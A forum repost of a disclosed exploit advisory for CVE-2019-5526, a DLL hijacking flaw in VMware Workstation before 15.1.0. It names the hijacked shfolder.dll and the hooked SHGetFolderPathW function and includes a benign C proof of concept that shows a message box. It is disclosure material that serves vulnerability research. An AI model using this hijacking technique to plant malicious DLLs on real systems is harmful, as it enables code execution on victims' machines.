VMware Workstation DLL Hijacking

✨ DeeZNuTz

✨ DeeZNuTz

✨ Master ✨
Staff member
May 15, 2017
990
759
1,045
14uxusx.png



VMware Workstation versions prior to 15.1.0 suffer from a dll hijacking vulnerability.

MD5 | e4ae43fff5271c25af6a88e2b9cdeb55

Download

Code:
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Date: 2019-05-14
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------
Click to expand...

https://www.vmware.com/security/advisories/VMSA-2019-0007.html
 
You must log in or register to reply here.

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

Home Forums

User Menu

Login
Top Bottom